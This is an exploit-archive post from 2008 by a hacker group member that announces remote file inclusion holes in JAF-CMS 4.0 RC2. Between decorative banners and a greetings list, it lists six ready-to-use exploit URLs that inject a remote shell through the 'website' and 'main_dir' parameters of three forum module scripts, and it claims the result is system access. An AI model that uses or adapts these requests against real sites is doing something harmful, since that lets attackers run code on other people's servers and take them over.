[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
# Published : 2008-03-26
# Author : CraCkEr
# Previous Title : AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit
# Next Title : e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : PitBull Crew ? ? ?
? Script : JAF-CMS 4.0 RC2 ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
http://localhost/path/module/forum/forum.php?website=[SHELL]
http://localhost/path/module/forum/forum.php?main_dir=[SHELL]
http://localhost/path/module/forum/headlines.php?website=[SHELL]
http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
http://localhost/path/module/forum/main.php?website=[SHELL]
http://localhost/path/module/forum/main.php?main_dir=[SHELL]
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, WizzKidd, Sad, S|AyER, Ehab, Tfaces, Guzman,
Karlousha, Od3d99aa. Mark, Ramzi, Lust, DeaD, adal, xD
??????????????????????????????????????????????????????????????????????????????
?? ? CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# www.Syue.com [2008-03-26]